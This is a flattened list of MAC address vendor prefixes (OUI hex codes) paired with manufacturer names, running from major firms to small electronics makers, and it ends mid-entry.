Honey Bee (Hong Kong) Limited 345B11 EVI HEAT AB 78BAD0 Shinybow Technology Co. Ltd. 2C3F38 Cisco Systems, Inc 4050E0 Milton Security Group LLC 000830 Cisco Systems, Inc 8C8A6E ESTUN AUTOMATION TECHNOLOY CO., LTD BC779F SBM Co., Ltd. 406AAB RIM A078BA Pantech Co., Ltd. 7C1E52 Microsoft DCB4C4 Microsoft XCG ACCB09 Hefcom Metering (Pty) Ltd 1866E3 Veros Systems, Inc. 74FDA0 Compupal (Group) Corporation CCB8F1 EAGLE KINGDOM TECHNOLOGIES LIMITED A429B7 bluesky 48F317 Private 704642 CHYNG HONG ELECTRONIC CO., LTD. 9C5C8D FIREMAX INDÚSTRIA E COMÉRCIO DE PRODUTOS ELETRÔNICOS LTDA D4206D HTC Corporation D41C1C RCF S.P.A. 04888C Eifelwerk Butler Systeme GmbH CCF8F0 Xi'an HISU Multimedia Technology Co.,Ltd. D45AB2 Galleon Systems 182C91 Concept Development, Inc. 248707 SEnergy Corporation C4C19F National Oilwell Varco Instrumentation, Monitoring, and Optimization (NOV IMO) 58920D Kinetic Avionics Limited 30DE86 Cedac Software S.r.l. 18C451 Tucson Embedded Systems FC1794 InterCreative Co., Ltd B40B7A Brusa Elektronik AG 24EC99 ASKEY COMPUTER CORP 280CB8 Mikrosay Yazilim ve Elektronik A.S. 3CC99E Huiyang Technology Co., Ltd 449CB5 Alcomp, Inc A44B15 Sun Cupid Technology (HK) LTD 48C862 Simo Wireless,Inc. AC02EF Comsis B8B42E Gionee Communication Equipment Co,Ltd.ShenZhen 443EB2 DEOTRON Co., LTD. D059C3 CeraMicro Technology Corporation 78BEB6 Enhanced Vision B0BF99 WIZITDONGDO 2C1EEA AERODEV B4FC75 SEMA Electronics(HK) CO.,LTD 1C8E8E DB Communication & Systems Co., ltd. 9C417C Hame Technology Co., Limited 9C6ABE QEES ApS. 70B921 Fiberhome Telecommunication Technologies Co.,LTD A0E295 DAT System Co.,Ltd 40F14C ISE Europe SPRL 68F895 Redflow Limited D4F0B4 Napco Security Technologies 9C934E Xerox Corporation E8944C Cogent Healthcare Systems Ltd 9067F3 Alcatel Lucent 3826CD ANDTEK D8973B Artesyn Embedded Technologies A0165C Triteka LTD 2C8BF2 Hitachi Metals America Ltd 986022 EMW Co., Ltd. BC99BC FonSee Technology Inc. 783F15 EasySYNC Ltd. 147411 RIM F8A9DE PUISSANCE PLUS F4A52A Hawa Technologies Inc E8B748 Cisco Systems, Inc 0C6E4F PrimeVOLT Co., Ltd. B8D49D M Seven System Ltd. 18D071 DASAN CO., LTD. 88BFD5 Simple Audio Ltd 24CBE7 MYK, Inc. B0A10A Pivotal Systems Corporation 802DE1 Solarbridge Technologies 044665 Murata Manufacturing Co., Ltd. 3C672C Sciovid Inc. 58E476 CENTRON COMMUNICATIONS TECHNOLOGIES FUJIAN CO.,LTD 447E95 Alpha and Omega, Inc B8871E Good Mind Industries Co., Ltd. D4F027 Trust Power Ltd. 900917 Far-sighted mobile 0054AF Continental Automotive Systems Inc. ACCABA Midokura Co., Ltd. 0C8112 Private 9C95F8 SmartDoor Systems, LLC 0455CA BriView (Xiamen) Corp. 781DFD Jabil Inc 18AEBB Siemens Convergence Creators GmbH&Co.KG 50FAAB L-tek d.o.o. 3891FB Xenox Holding BV A8E018 Nokia Corporation CCC62B Tri-Systems Corporation D8C068 Netgenetech.co.,ltd. 601199 Siama Systems Inc A88CEE MicroMade Galka i Drozdz sp.j. DC9B1E Intercom, Inc. BC5FF4 ASRock Incorporation E8B4AE Shenzhen C&D Electronics Co.,Ltd DC2B66 InfoBLOCK S.A. de C.V. 6C81FE Mitsuba Corporation C027B9 Beijing National Railway Research & Design Institute of Signal & Communication Co., Ltd. B0BDA1 ZAKLAD ELEKTRONICZNY SIMS 1435B3 Future Designs, Inc. AC932F Nokia Corporation 7C7D41 Jinmuyu Electronics Co., Ltd. 4C1480 NOREGON SYSTEMS, INC 64D1A3 Sitecom Europe BV F43E9D Benu Networks, Inc. 64094C Beijing Superbee Wireless Technology Co.,Ltd 0CF3EE EM Microelectronic 70B265 Hiltron s.r.l. 04E2F8 AEP Ticketing solutions srl EC9ECD Artesyn Embedded Technologies 8C5105 Shenzhen ireadygo Information Technology CO.,LTD. C8208E Storagedata 34B571 PLDS 3C7437 RIM 6CA906 Telefield Ltd 78223D Affirmed Networks 3C02B1 Creation Technologies LP E441E6 Ottec Technology GmbH 0CF0B4 Globalsat International Technology Ltd A0AAFD EraThink Technologies Corp. 2872F0 ATHENA 1C19DE eyevis GmbH 9C807D SYSCABLE Korea Inc. A83944 Actiontec Electronics, Inc 74E06E Ergophone GmbH B08991 LGE 30142D Piciorgros GmbH 50AF73 Shenzhen Bitland Information Technology Co., Ltd. 5C9AD8 FUJITSU LIMITED A4C0E1 Nintendo Co., Ltd. 4C3B74 VOGTEC(H.K.) Co., Ltd 684352 Bhuu Limited 386E21 Wasion Group Ltd. 609E64 Vivonic GmbH BC15A6 Taiwan Jantek Electronics,Ltd. DCDECA Akyllor A4856B Q Electronics Ltd 20D5AB Korea Infocom Co.,Ltd. 743889 ANNAX Anzeigesysteme GmbH 44D2CA Anvia TV Oy EC9233 Eddyfi NDT Inc ECE90B SISTEMA SOLUCOES ELETRONICAS LTDA - EASYTECH A08C9B Xtreme Technologies Corp 60DA23 Estech Co.,Ltd 44DCCB SEMINDIA SYSTEMS PVT LTD F8F014 RackWare Inc. 2826A6 PBR electronics GmbH B428F1 E-Prime Co., Ltd. F02A61 Waldo Networks, Inc. C8A70A Verizon Business 304EC3 Tianjin Techua Technology Co., Ltd. B4CFDB Shenzhen Jiuzhou Electric Co.,LTD 5C6A7D KENTKART EGE ELEKTRONIK SAN. VE TIC. LTD. STI. FCD4F2 The Coca Cola Company C01242 Alpha Security Products BC20BA Inspur (Shandong) Electronic Information Co., Ltd 1CFEA7 IDentytech Solutins Ltd. A0DE05 JSC "Irbis-T" 48DF1C Wuhan NEC Fibre Optic Communications industry Co. Ltd BC71C1 XTrillion, Inc. AC8112 Gemtek Technology Co., Ltd. 686359 Advanced Digital Broadcast SA E0E8E8 Olive Telecommunication Pvt. Ltd 6052D0 FACTS Engineering D49C8E University of FUKUI AC2FA8 Humannix Co.,Ltd. 1064E2 ADFweb.com s.r.l. CC34D7 GEWISS S.P.A. 0817F4 IBM Corp CCD811 Aiconn Technology Corporation 44599F Criticare Systems, Inc 3C2F3A SFORZATO Corp. 74CE56 Packet Force Technology Limited Company C44B44 Omniprint Inc. F43814 Shanghai Howell Electronic Co.,Ltd 90610C Fida International (S) Pte Ltd 3C5F01 Synerchip Co., Ltd. ECBBAE Digivoice Tecnologia em Eletronica Ltda 9873C4 Sage Electronic Engineering LLC B40142 GCI Science & Technology Co.,LTD 740ABC LightwaveRF Technology Ltd 10A13B FUJIKURA RUBBER LTD. F4E142 Delta Elektronika BV E0D10A Katoudenkikougyousyo co ltd 48C8B6 SysTec GmbH 3C6278 SHENZHEN JETNET TECHNOLOGY CO.,LTD. CC09C8 IMAQLIQ LTD 9C4563 DIMEP Sistemas 18922C Virtual Instruments 28061E NINGBO GLOBAL USEFUL ELECTRIC CO.,LTD 64E8E6 global moisture management system 34A183 AWare, Inc 58D08F IEEE 1904.1 Working Group 6C9CE9 Nimble Storage A49B13 Digital Check C8EE08 TANGTOP TECHNOLOGY CO.,LTD 2C3068 Pantech Co.,Ltd 00BD27 Exar Corp. 5C4058 Jefferson Audio Video Systems, Inc. D43D67 Carma Industries Inc. C8D5FE Shenzhen Zowee Technology Co., Ltd 58DB8D Fast Co., Ltd. E446BD C&C TECHNIC TAIWAN CO., LTD. 8CDD8D Wifly-City System Inc. 20A2E7 Lee-Dickens Ltd FCEDB9 Arrayent 44ED57 Longicorn, inc. EC98C1 Beijing Risbo Network Technology Co.,Ltd 6854F5 enLighted Inc D4A928 GreenWave Reality Inc E06290 Jinan Jovision Science & Technology Co., Ltd. 100E2B NEC CASIO Mobile Communications 7CB542 ACES Technology 905446 TES ELECTRONIC SOLUTIONS 544A05 wenglor sensoric gmbh 70E139 3view Ltd 18422F Alcatel Lucent 38A95F Actifio Inc F4DCDA Zhuhai Jiahe Communication Technology Co., limited E80462 Cisco Systems, Inc DCD0F7 Bentek Systems Ltd. C46354 U-Raku, Inc. 405FBE RIM D496DF SUNGJIN C&T CO.,LTD 447C7F Innolight Technology Corporation 5C864A Secret Labs LLC 7472F2 Chipsip Technology Co., Ltd. E0A670 Nokia Corporation 98E165 Accutome 785712 Mobile Integration Workgroup 380A0A Sky-City Communication and Electronics Limited Company 0CD696 Amimon Ltd F4DC4D Beijing CCD Digital Technology Co., Ltd 4013D9 Global ES AC4FFC SVS-VISTEK GmbH B43741 Consert, Inc. 94857A Evantage Industries Corp 24AF54 NEXGEN Mediatech Inc. DC4EDE SHINYEI TECHNOLOGY CO., LTD. F0F842 KEEBOX, Inc. 4083DE Zebra Technologies Inc F0AD4E Globalscale Technologies, Inc. 08FAE0 Fohhn Audio AG 903D5A Shenzhen Wision Technology Holding Limited 7CA29B D.SignT GmbH & Co. KG A04041 SAMWONFA Co.,Ltd. 8897DF Entrypass Corporation Sdn. Bhd. E087B1 Nata-Info Ltd. 40406B Icomera 6C22AB Ainsworth Game Technology 68CA00 Octopus Systems Limited 3018CF DEOS control systems GmbH C0CFA3 Creative Electronics & Software, Inc. 6089B7 KAEL MÜHENDİSLİK ELEKTRONİK TİCARET SANAYİ LİMİTED ŞİRKETİ 30525A NST Co., LTD 2CA780 True Technologies Inc. 7C6F06 Caterpillar Trimble Control Technologies 70D5E7 Wellcore Corporation 3CF72A Nokia Corporation 949C55 Alta Data Technologies D479C3 Cameronet GmbH & Co. KG 0C1DC2 SeAH Networks 5475D0 Cisco Systems, Inc E0589E Laerdal Medical 58B9E1 Crystalfontz America, Inc. 20D906 Iota, Inc. F45595 HENGBAO Corporation LTD. 545FA9 Teracom Limited 5CE286 Nortel Networks 8C640B Beyond Devices d.o.o. FCE192 Sichuan Jinwangtong Electronic Science&Technology Co,.Ltd 4C5DCD Oy Finnish Electric Vehicle Technologies Ltd 70D57E Scalar Corporation B0E39D CAT SYSTEM CO.,LTD. 9835B8 Assembled Products Corporation 288915 CashGuard Sverige AB 180C77 Westinghouse Electric Company, LLC 7C2E0D Blackmagic Design 9C4E20 Cisco Systems, Inc 1C3A4F AccuSpec Electronics, LLC D87533 Nokia Corporation 601283 TSB REAL TIME LOCATION SYSTEMS S.L. 98DCD9 UNITEC Co., Ltd. E0BC43 C2 Microsystems, Inc. 04FE7F Cisco Systems, Inc EC4476 Cisco Systems, Inc 14A62C S.M. Dezac S.A. 547FEE Cisco Systems, Inc ACEA6A GENIX INFOCOMM CO., LTD. A8F470 Fujian Newland Communication Science Technologies Co.,Ltd. 8C736E FUJITSU LIMITED 583CC6 Omneality Ltd. B0C8AD People Power Company 181714 DAEWOOIS F0EC39 Essec 10E6AE Source Technologies, LLC 2CA835 RIM C41ECE HMI Sources Ltd. 408A9A TITENG CO., Ltd. F445ED Portable Innovation Technology Ltd. 6C32DE Indieon Technologies Pvt. Ltd. 94236E Shenzhen Junlan Electronic Ltd 50F003 Open Stack, Inc. DC49C9 CASCO SIGNAL LTD 70D880 Upos System sp. z o.o. A05DC1 TMCT Co., LTD. B86491 CK Telecom Ltd 04C05B Tigo Energy 8038FD LeapFrog Enterprises, Inc. ACBEB6 Visualedge Technology Co., Ltd. 2C9127 Eintechno Corporation 5C1437 Thyssenkrupp Aufzugswerke GmbH 9C55B4 I.S.E. S.r.l. 487119 SGB GROUP LTD. 681FD8 Siemens Industry, Inc. AC583B Human Assembler, Inc. E8E776 Shenzhen Kootion Technology Co., Ltd 702F97 Aava Mobile Oy 10CA81 PRECIA 5403F5 EBN Technology Corp. A8995C aizo ag 4012E4 Compass-EOS 446C24 Reallin Electronic Co.,Ltd 2046F9 Advanced Network Devices (dba:AND) F8E968 Egker Kft. A0231B TeleComp R&D Corp. B8A3E0 BenRui Technology Co.,Ltd 3CF52C DSPECIALISTS GmbH 4C63EB Application Solutions (Electronics and Vision) Ltd A4B1EE H. ZANDER GmbH & Co. KG 842141 Shenzhen Ginwave Technologies Ltd. 4001C6 3COM EUROPE LTD 9C5E73 Calibre UK LTD 6C1811 Decatur Electronics 64A837 Juni Korea Co., Ltd 48343D IEP GmbH 609F9D CloudSwitch CCCC4E Sun Fountainhead USA. Corp 688540 IGI Mobile, Inc. A09A5A Time Domain E4751E Getinge Sterilization AB 1065A3 Panamax LLC 9C5B96 NMR Corporation 60F13D JABLOCOM s.r.o. B894D2 Retail Innovation HTT AB F0C24C Zhejiang FeiYue Digital Technology Co., Ltd 40A6A4 PassivSystems Ltd 94BA31 Visiontec da Amazônia Ltda. 78B81A INTER SALES A/S B0E97E Advanced Micro Peripherals 50252B Nethra Imaging Incorporated F8811A OVERKIZ 3863F6 3NOD MULTIMEDIA(SHENZHEN)CO.,LTD D4AAFF MICRO WORLD 942E63 Finsécur AC8317 Shenzhen Furtunetel Communication Co., Ltd ACD180 Crexendo Business Solutions, Inc. 202CB7 Kong Yue Electronics & Information Industry (Xinhui) Ltd. 74E537 RADSPIN CC0080 BETTINI SRL 644BC3 Shanghai WOASiS Telecommunications Ltd., Co. 0026C3 Insightek Corp. 0026C1 ARTRAY CO., LTD. 0026BE Schoonderbeek Elektronica Systemen B.V. 002717 CE Digital(Zhenjiang)Co.,Ltd 002716 Adachi-Syokai Co., Ltd. 0026E1 Stanford University, OpenFlow Group 0026DC Optical Systems Design 0026EC Legrand Home Systems, Inc 0026E9 SP Corp 0026EB Advanced Spectrum Technology Co., Ltd. 002700 Shenzhen Siglent Technology Co., Ltd. 0026D4 IRCA SpA 002663 Shenzhen Huitaiwei Tech. Ltd, co. 002661 Irumtek Co., Ltd. 00265B Hitron Technologies. Inc 002656 Sansonic Electronics USA 002658 T-Platforms (Cyprus) Limited 00267D A-Max Technology Macao Commercial Offshore Company Limited 00267C Metz-Werke GmbH & Co KG 002674 Hunter Douglas 002673 RICOH COMPANY,LTD. 00266D MobileAccess Networks 00266F Coordiwise Technology Corp. 00266E Nissho-denki Co.,LTD. 00268C StarLeaf Ltd. 00268B Guangzhou Escene Computer Technology Limited 002681 Interspiro AB 002683 Ajoho Enterprise Co., Ltd. 00267F Oregan Networks Ltd. 00264C Shanghai DigiVision Technology Co., Ltd. 002646 SHENYANG TONGFANG MULTIMEDIA TECHNOLOGY COMPANY LIMITED 002644 Thomson Telecom Belgium 00263F LIOS Technology GmbH 00263B Onbnetech 002634 Infineta Systems, Inc 00262F HAMAMATSU TOA ELECTRONICS 002631 COMMTACT LTD 002624 Thomson Inc. 00261A Femtocomm System Technology Corp. 002606 RAUMFELD GmbH 002607 Enabling Technology Pty Ltd 002698 Cisco Systems, Inc 00269B SOKRAT Ltd. 0026B5 ICOMM Tele Ltd 0026A1 Megger 00259D Private 002598 Zhong Shan City Litai Electronic Industrial Co. Ltd 002599 Hedon e.d. B.V. 002597 Kalki Communication Technologies 002592 Guangzhou Shirui Electronic Co., Ltd 002594 Eurodesign BG LTD 00258A Pole/Zero Corporation 002584 Cisco Systems, Inc 002579 J & F Labs 00257F CallTechSolution Co.,Ltd 0025C2 RingBell Co.,Ltd. 0025B4 Cisco Systems, Inc 0025B2 MBDA Deutschland GmbH 002577 D-BOX Technologies 002572 Nemo-Q International AB 00256B ATENIX E.E. s.r.l. 00256E Van Breda B.V. 002565 Vizimax Inc. 002602 SMART Temps LLC 002605 CC Systems AB 0025FB Tunstall Healthcare A/S 0025F4 KoCo Connector AG 00255E Shanghai Dare Technologies Co.,Ltd. 00255F SenTec AG 0025D4 General Dynamics Mission Systems 0025EF I-TEC Co., Ltd. 0025E3 Hanshinit Inc. 0025A7 itron 00259F TechnoDigital Technologies GmbH 0024E4 Withings 0024DE GLOBAL Technology Inc. 0024DB Alcohol Monitoring Systems 0024DD Centrak, Inc. 002529 COMELIT GROUP S.P.A 00252A Chengdu GeeYa Technology Co.,LTD 002528 Daido Signal Co., Ltd. 002526 Genuine Technologies Co., Ltd. 0024EA iris-GmbH infrared & intelligent sensors 0024ED YT Elec. Co,.Ltd. 0024EC United Information Technology Co.,Ltd. 0024E6 In Motion Technology Inc. 0024E7 Plaster Networks 0024D5 Winward Industrial Limited 0024C2 Asumo Co.,Ltd. 0024BF Carrier Culoz SA 002521 Logitek Electronic Systems, Inc. 00251F ZYNUS VISION INC. 00251E ROTEL TECHNOLOGIES 002519 Viaas Inc 00253B din Dietmar Nocker Facilitymanagement GmbH 00253D DRS Consolidated Controls 002535 Minimax GmbH & Co KG 002513 CXP DIGITAL BV 002503 IBM Corp 002504 Valiant Communications Limited 0024AE IDEMIA 0024AD Adolf Thies Gmbh & Co. KG 0024A7 Advanced Video Communications Inc. 0024AB A7 Engineering, Inc. 0024A4 Siklu Communication 00249A Beijing Zhongchuang Telecommunication Test Co., Ltd. 00243A Ludl Electronic Products 002439 Digital Barriers Advanced Technologies 002434 Lectrosonics, Inc. 00242F Micron 00245F Vine Telecom CO.,Ltd. 002455 MuLogic BV 00245A Nanjing Panda Electronics Company Limited 00245B RAIDON TECHNOLOGY, INC. 002459 ABB Automation products GmbH 00244E RadChips, Inc. 00249E ADC-Elektronik GmbH 00249F RIM Testing Services 002488 Centre For Development Of Telematics 00248F DO-MONIX 0024C0 NTI COMODO INC 0024BB CENTRAL Corporation 0024BC HuRob Co.,Ltd 0024B7 GridPoint, Inc. 002479 Optec Displays, Inc. 002418 Nextwave Semiconductor 002412 Benign Technologies Co, Ltd. 00240D OnePath Networks LTD. 00240B Virtual Computer Inc. 002468 Sumavision Technologies Co.,Ltd 002466 Unitron nv 002426 NOHMI BOSAI LTD. 002429 MK MASTER INC. 002391 Maxian 002392 Proteus Industries Inc. 002393 AJINEXTEK 00238D Techno Design Co., Ltd. 002387 ThinkFlood, Inc. 002384 GGH Engineering s.r.l. 0023EB Cisco Systems, Inc 0023EC Algorithmix GmbH 002402 Op-Tection GmbH 0023FC Ultra Stereo Labs, Inc 00237F PLANTRONICS, INC. 0023C1 Securitas Direct AB 0023BB Accretech SBS, Inc. 00236F DAQ System 002369 Cisco-Linksys, LLC 0023AA HFR, Inc. 0023A5 SageTV, LLC 00239E Jiangsu Lemote Technology Corporation Limited 0023DB saxnet gmbh 0023C8 TEAM-R 00232D SandForce 002323 Zylin AS 0022F8 PIMA Electronic Systems Ltd. 00231C Fourier Systems Ltd. 00231D Deltacom Electronics Ltd 002316 KISAN ELECTRONICS CO 00230F Hirsch Electronics Corporation 00230A ARBURG GmbH & Co KG 0022D6 Cypak AB 0022D0 Polar Electro Oy 0022C3 Zeeport Technology Inc. 002330 DIZIPIA, INC. 0022DE OPPO Digital, Inc. 0022D7 Nintendo Co., Ltd. 0022F1 Private 002240 Universal Telecom S/A 002242 Alacron Inc. 002234 Corventis Inc. 002232 Design Design Technology Ltd 00222B Nucomm, Inc. 002221 ITOH DENKI CO,LTD. 002226 Avaak, Inc. 00221D Freegene Technology LTD 002224 Good Will Instrument Co., Ltd. 00221B Morega Systems 002255 Cisco Systems, Inc 00224E SEEnergy Corp. 002245 Leine & Linde AB 002249 HOME MULTIENERGY SL 002287 Titan Wireless LLC 002288 Sagrad, Inc. 002285 NOMUS COMM SYSTEMS 00229E Social Aid Research Co., Ltd. 002295 SGM Technology for lighting spa 00226B Cisco-Linksys, LLC 002267 Nortel Networks 00225A Garde Security AB 0022A2 Xtramus Technologies 00220F MoCA (Multimedia over Coax Alliance) 00220A OnLive, Inc 002281 Daintree Networks Pty 002273 Techway 002203 Glensound Electronics Ltd 002204 KORATEK 0021FF Cyfrowy Polsat SA 0021F7 HPN Supply Chain 00216E Function ATI (Huizhou) Telecommunications Co., Ltd. 00216D Soltech Co., Ltd. 002187 Imacs GmbH 002181 Si2 Microsystems Limited 00217E Telit Communication s.p.a 0021B2 Fiberblaze A/S 0021AC Infrared Integrated Systems Ltd 0021A2 EKE-Electronics Ltd. 0021F4 INRange Systems, Inc 0021F5 Western Engravers Supply, Inc. 0021E4 I-WIN 0021E5 Display Solution AG 00218E MEKICS CO., LTD. 00218F Avantgarde Acoustic Lautsprechersysteme GmbH 0021C9 Wavecom Asia Pacific Limited 0021C2 GL Communications Inc 0021E2 visago Systems & Controls GmbH & Co. KG 0021DD Northstar Systems Corp 0021D5 X2E GmbH 002165 Presstek Inc. 00215B SenseAnywhere 00214E GS Yuasa Power Supply Ltd. 00214A Pixel Velocity, Inc 002146 Sanmina-SCI 002142 Advanced Control Systems doo 001FF5 Kongsberg Defence & Aerospace 001FF2 VIA Technologies, Inc. 001FF1 Paradox Hellas S.A. 001FE6 Alphion Corporation 001FCF MSI Technology GmbH 001FD1 OPTEX CO.,LTD. 001FC9 Cisco Systems, Inc 001FA9 Atlanta DTH, Inc. 001FA3 T&W Electronics(Shenzhen)Co.,Ltd. 001FA2 Datron World Communications, Inc. 00213A Winchester Systems Inc. 00212E dresden-elektronik 002130 Keico Hightech Inc. 002133 Building B, Inc 002134 Brandywine Communications 002101 Aplicaciones Electronicas Quasar (AEQ) 002103 GHI Electronics, LLC 001FF8 Siemens AG, Sector Industry, Drive Technologies, Motion Control Systems 001FFA Coretree, Co, Ltd 00211F SHINSUNG DELTATECH CO.,LTD. 002124 Optos Plc 002117 Tellord 00210F Cernium Corp 001FDC Mobile Safe Track Ltd 001F2B Orange Logic 001F2A ACCM 001F30 Travelping 001F24 DIGITVIEW TECHNOLOGY CO., LTD. 001F21 Inner Mongolia Yin An Science & Technology Development Co.,L 001F22 Source Photonics, Inc. 001F1D Atlas Material Testing Technology LLC 001F9C LEDCO 001F90 Actiontec Electronics, Inc 001F91 DBS Lodging Technologies, LLC 001F98 DAIICHI-DENTSU LTD. 001F93 Xiotech Corporation 001F64 Beijing Autelan Technology Inc. 001F51 HD Communications Corp 001F53 GEMAC Chemnitz GmbH 001F4C Roseman Engineering Ltd 001F50 Swissdis AG 001F48 Mojix Inc. 001F3E RP-Technik e.K. 001F37 Genesis I&C 001F2C Starbridge Networks 001F31 Radiocomp 001F15 Bioscrypt Inc 001F04 Granch Ltd. 001EF0 Gigafin Networks 001F70 Botik Technologies LTD 001F6D Cisco Systems, Inc 001EF2 Micro Motion Inc 001EEA Sensor Switch, Inc. 001EA6 Best IT World (India) Pvt. Ltd. 001EA5 ROBOTOUS, Inc. 001EA7 Actiontec Electronics, Inc 001EA0 XLN-t 001E98 GreenLine Communications 001E9A HAMILTON Bonaduz AG 001E94 SUPERCOM TECHNOLOGY CORPORATION 001E8F CANON INC. 001E83 LAN/MAN Standards Association (LMSC) 001E7C Taiwick Limited 001E78 Owitek Technology Ltd., 001E7A Cisco Systems, Inc 001EDF Master Industrialization Center Kista 001EE3 T&W Electronics (ShenZhen) Co.,Ltd 001ED9 Mitsubishi Precision Co.,LTd. 001ED3 Dot Technology Int'l Co., Ltd. 001E5C RB GeneralEkonomik 001E5D Holosys d.o.o. 001E60 Digital Lighting Systems, Inc 001E6C Opaque Systems 001E62 Siemon 001E44 SANTEC 001ECF PHILIPS ELECTRONICS UK LTD 001E22 ARVOO Imaging Products BV 001E1A Best Source Taiwan Inc. 001E19 GTRI 001E14 Cisco Systems, Inc 001E0E MAXI VIEW HOLDINGS LIMITED 001DA7 Seamless Internet 001DA8 Takahata Electronics Co.,Ltd 001DA9 Castles Technology, Co., LTD 001DA5 WB Electronics 001DA1 Cisco Systems, Inc 001DDE Zhejiang Broadcast&Television Technology Co.,Ltd. 001DCB Exéns Development Oy 001DCA PAV Electronics Limited 001DC2 XORTEC OY 001DF0 Vidient Systems, Inc. 001DEC Marusys 001DE8 Nikko Denki Tsushin Corporation(NDTC) 001DDA Mikroelektronika spol. s r. o. 001DE3 Intuicom 001DE5 Cisco Systems, Inc 001D96 WatchGuard Video 001D8F PureWave Networks 001DB8 Intoto Inc. 001DB0 FuJian HengTong Information Technology Co.,Ltd 001D8C La Crosse Technology LTD 001E2F DiMoto Pty Ltd 001E36 IPTE 001E27 SBN TECH Co.,Ltd. 001E0F Briot International 001DFE Palm, Inc 001DF5 Sunshine Co,LTD 001D07 Shenzhen Sang Fei Consumer Communications Co.,Ltd 001D06 HM Electronics, Inc. 001D01 Neptune Digital 001CF8 Parade Technologies, Ltd. 001CF7 AudioScience 001CF6 Cisco Systems, Inc 001D33 Maverick Systems Inc. 001D2C Wavetrend Technologies (Pty) Limited 001D27 NAC-INTERCOM 001D52 Defzone B.V. 001D4A Carestream Health, Inc. 001D50 SPINETIX SA 001D71 Cisco Systems, Inc 001D65 Microwave Radio Communications 001D64 Adam Communications Systems Int Ltd 001D5E COMING MEDIA CORP. 001D55 ZANTAZ, Inc 001CF5 Wiseblue Technology Limited 001CEE SHARP Corporation 001D24 Aclara Power-Line Systems Inc. 001D18 Power Innovation GmbH 001D1B Sangean Electronics Inc. 001D17 Digital Sky Corporation 001D45 Cisco Systems, Inc 001D36 ELECTRONICS CORPORATION OF INDIA LIMITED 001D69 Knorr-Bremse IT-Services GmbH 001CCF LIMETEK 001CCA Shanghai Gaozhi Science & Technology Development Co. 001CC9 Kaise Electronic Technology Co., Ltd. 001CC8 INDUSTRONIC Industrie-Electronic GmbH & Co. KG 001CC6 ProStor Systems 001C94 LI-COR Biosciences 001C8C DIAL TECHNOLOGY LTD. 001C93 ExaDigm Inc 001C85 Eunicorn 001C80 New Business Division/Rhea-Information CO., LTD. 001CA7 International Quartz Limited 001CAB Meyer Sound Laboratories, Inc. 001C9E Dualtech IT AB 001C67 Pumpkin Networks, Inc. 001C60 CSP Frontier Technologies,Inc. 001C51 Celeno Communications 001C59 DEVON IT 001C54 Hillstone Networks Inc 001C3E ECKey Corporation 001C39 S Netsystems Inc. 001C37 Callpod, Inc. 001C33 Sutron 001C2F Pfister GmbH 001C83 New Level Telecom Co., Ltd. 001C76 The Wandsworth Group Ltd 001C72 Mayer & Cie GmbH & Co KG 001C6A Weiss Engineering Ltd. 001C48 WiDeFi, Inc. 001C46 QTUM 001C42 Parallels, Inc. 001CE3 Optimedical Systems 001CDE Interactive Multimedia eXchange Inc. 001CBE Nintendo Co., Ltd. 001CAD Wuhan Telecommunication Devices Co.,Ltd 001BF6 CONWISE Technology Corporation Ltd. 001BF8 Digitrax Inc. 001BF1 Nanjing SilverNet Software Co., Ltd. 001BEF Blossoms Digital Technology Co.,Ltd. 001BEB DMP Electronics INC. 001BE7 Postek Electronics Co., Ltd. 001BAD iControl Incorporated 001BA7 Lorica Solutions 001BA5 MyungMin Systems, Inc. 001BA2 IDS Imaging Development Systems GmbH 001B9D Novus Security Sp. z o.o. 001BCE Measurement Devices Ltd 001BC9 FSN DISPLAY INC 001BC3 Mobisolution Co.,Ltd 001C0F Cisco Systems, Inc 001C0A Shenzhen AEE Technology Co.,Ltd. 001C0D G-Technology, Inc. 001C03 Betty TV Technology AG 001B87 Deepsound Tech. Co., Ltd 001B7F TMN Technologies Telecomunicacoes Ltda 001B7E Beckmann GmbH 001C27 Sunell Electronics Co. 001C22 Aeris Elettronica s.r.l. 001C1D CHENZHOU GOSPELL DIGITAL TECHNOLOGY CO.,LTD 001BB8 BLUEWAY ELECTRONIC CO;LTD 001BB2 Intellect International NV 001BB0 Bharat Electronics Limited 001BE3 Health Hero Network, Inc. 001BDC Vencer Co., Ltd. 001BD5 Cisco Systems, Inc 001B95 VIDEO SYSTEMS SRL 001B90 Cisco Systems, Inc 001AE9 Nintendo Co., Ltd. 001AE5 Mvox Technologies Inc. 001AE4 Medicis Technologies Corporation 001AF1 Embedded Artists AB 001AF8 Copley Controls Corporation 001AF5 PENTAONE. CO., LTD. 001AED INCOTEC GmbH 001AEE Shenztech Ltd 001AE3 Cisco Systems, Inc 001ADF Interactivetv Pty Limited 001AE1 EDGE ACCESS INC 001B7A Nintendo Co., Ltd. 001B72 Sicep s.p.a. 001B74 MiraLink Corporation 001B6D Midtronics, Inc. 001B6F Teletrak Ltd 001B12 Apprion 001B0D Cisco Systems, Inc 001B0A Intelligent Distributed Controls Ltd 001B3A SIMS Corp. 001B34 Focus System Inc. 001B2E Sinkyo Electron Inc 001B5F Alien Technology 001B5E BPL Limited 001B61 Digital Acoustics, LLC 001B5C Azuretec Co., Ltd. 001B2D Med-Eng Systems Inc. 001B1D Phoenix International Co., Ltd 001B1A e-trees Japan, Inc. 001AFE SOFACREAL 001B4B SANION Co., Ltd. 001B4D Areca Technology Corporation 001AB2 Cyber Solutions Inc. 001AB7 Ethos Networks LTD. 001AA2 Cisco Systems, Inc 001AA5 BRN Phoenix 001A9C RightHand Technologies, Inc. 001AC0 JOYBIEN TECHNOLOGIES CO., LTD. 001AC2 YEC Co.,Ltd. 001AB1 Asia Pacific Satellite Industries Co., Ltd. 001A90 Trópico Sistemas e Telecomunicações da Amazônia LTDA. 001A94 Votronic GmbH 001A86 New Wave Design & Verification 001A7E LN Srithai Comm Ltd. 001AD2 Eletronica Nitron Ltda 001ACE YUPITERU CORPORATION 001ACC Celestial Semiconductor, Ltd 001AC7 UNIPOINT 001A9E ICON Digital International Limited 001A98 Asotel Communication Limited Taiwan Branch 001A97 fitivision technology Inc. 001A5A Korea Electric Power Data Network (KDN) Co., Ltd 001A5F KitWorks.fi Ltd. 001A5D Mobinnova Corp. 001A72 Mosart Semiconductor Corp. 001A68 Weltec Enterprise Co., Ltd. 001A35 BARTEC GmbH 001A37 Lear Corporation 001A38 Sanmina-SCI 001A2B Ayecom Technology Co., Ltd. 001A28 ASWT Co., LTD. Taiwan Branch H.K. 001A2C SATEC Co.,LTD 001A27 Ubistar 001A00 MATRIX INC. 0019FF Finnzymes 0019FA Cable Vision Electronics CO., LTD. 0019F1 Star Communication Network Technology Co.,Ltd 0019EC Sagamore Systems, Inc. 0019BC ELECTRO CHANCE SRL 0019A3 